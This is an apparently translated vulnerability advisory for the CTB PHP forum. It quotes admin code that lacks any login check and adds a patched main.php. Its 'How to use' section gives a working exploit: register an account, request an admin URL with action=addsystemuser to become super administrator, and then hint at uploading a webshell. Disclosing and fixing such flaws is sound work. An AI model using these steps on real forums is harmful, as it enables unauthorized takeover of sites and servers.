Beautiful but insecure: the CTB PHP forum

Source: Internet
Author: User

>>>this short piece is dedicated to caojing<<<

Affected versions:
^^^^^^^
Currently all versions (1.3 Alpha is the highest version at the time of writing)

Description:
^^^^^^
CTB is an open-source PHP forum whose source code is developed and maintained by <11cn.org>. Because its back-end management files do not verify that the caller is logged in as an administrator, an unauthorized user can directly add a forum super administrator, which puts the forum and the server at risk.

Details:
^^^^
The CTB code is very well structured, orderly and pleasing to read; it really is a graceful program, and its functional modules in particular taught me a lot. The security side, however, is worrying:

Look at the following code:

/admin/main.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
// Collect the GET variables into $return
if (is_array($_GET)) {
    foreach ($_GET as $k => $v) {
        if (is_array($_GET[$k])) {
            foreach ($_GET[$k] as $k2 => $v2) {
                $return[$k][$k2] = $v2;
            }
        } else {
            $return[$k] = $v;
        }
    }
}
...
// The module name comes straight from the request and is used as an include path
$mod = isset($_GET['mod']) ? $_GET['mod'] : $_POST['mod'];
if (!file_exists($mod . ".php")) {
    $mod = "mainright";
}
require_once($mod . ".php");
//-----------------------------------------------------------------------------

// Initialize the class variables
$CTB = new Module;
$CTB->set = $set;
$CTB->tplpath = "./templates";
$CTB->input = $return;
// A client-supplied cookie is accepted in place of the server-side session
$CTB->sess = isset($_COOKIE["Sess_adminname"]) ? $_COOKIE : $_SESSION;
$CTB->execute();
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

There is no login check anywhere here. Now let's look at the file that adds administrators:

/admin/systemuser.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
// System management module subclass
class Module extends CommonClass
{
    function execute() {
        // The action is dispatched directly from the request parameters
        switch ($this->input['action']) {
            ...
            case 'addsystemuser':
                $this->addsystemuser();
                break;
            ...
        }
    }

    function addsystemuser()
    {
        // Simple format check of the input data (format only, not authorization)
        $this->inputcheck("main.php?mod=systemuser&action=showsystemuser");
        // Perform the add operation
        $this->file = "../" . $this->set['datapath'] . "/users/list.php";
        $systemLine = $this->select(4, $this->input['systemusername']);
        ....
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Still no verification; the request goes straight through!
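As an added example (not CTB's own code), this is the check that /admin/main.php is missing: verify the administrator session once, before any module file is included, and dispatch only to known modules. It assumes that `$set` has already been loaded by the configuration include, as in main.php, that the session stores the administrator name under `adminname`, and that `loadAdminNames()` is a hypothetical helper returning the names stored in `$set['datapath'] . '/users/list.php'`.

```php
<?php
// Added example, not CTB's own code: the admin check that /admin/main.php
// lacks. It must run before any module file is required, because every
// module's execute() trusts $this->input as-is.
// Assumptions: $set was loaded by the configuration include (as in main.php),
// the session key 'adminname' holds the logged-in administrator, and
// loadAdminNames() is a hypothetical helper returning the names stored in
// $set['datapath'] . '/users/list.php'.

session_start();

// Dispatch only to modules known to exist under /admin; never turn raw
// user input into an include path, even behind a file_exists() guard.
$allowedModules = array('mainright', 'login', 'systemuser');

$mod = isset($_GET['mod']) ? $_GET['mod'] : (isset($_POST['mod']) ? $_POST['mod'] : 'mainright');
if (!in_array($mod, $allowedModules, true)) {
    $mod = 'mainright';
}

// The login module is the only one reachable without an admin session.
if ($mod !== 'login') {
    // The original main.php accepts $_COOKIE["Sess_adminname"] in place of
    // the session. A cookie is chosen by the client, so only the
    // server-side session may vouch for an administrator.
    $adminName = isset($_SESSION['adminname']) ? $_SESSION['adminname'] : '';
    if ($adminName === '' || !in_array($adminName, loadAdminNames($set), true)) {
        header('Location: main.php?mod=login');
        exit;
    }
}

require_once $mod . '.php';
```

Performing the check here covers every module at once, instead of relying on each module's execute() to remember it.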

How to use:
^^^^^^^
Register a user first:

Login ID: cat
User name: Dog
Password: ilikecat
Repeat password: ilikecat
E-mail: cat@dog.com

Then submit the following URL:

http://www.target.com/ctb/admin/main.php?mod=systemuser&systemUserName=dog&systemUserMode=1&action=addsystemuser

Haha, now you are a super administrator. Don't believe it? Submit the following URL to log in to the back end:

http://www.psych.com/ctb/admin/main.php?mod=login

Admin name: Cat
Admin password: ilikecat

Hey... it worked!

Do you want to change the back-end upload file types now and upload a webshell? Hmm, I guessed as much ...

Postscript: I also found some glaring typos in the CTB code comments; I hope they can be corrected at the same time.
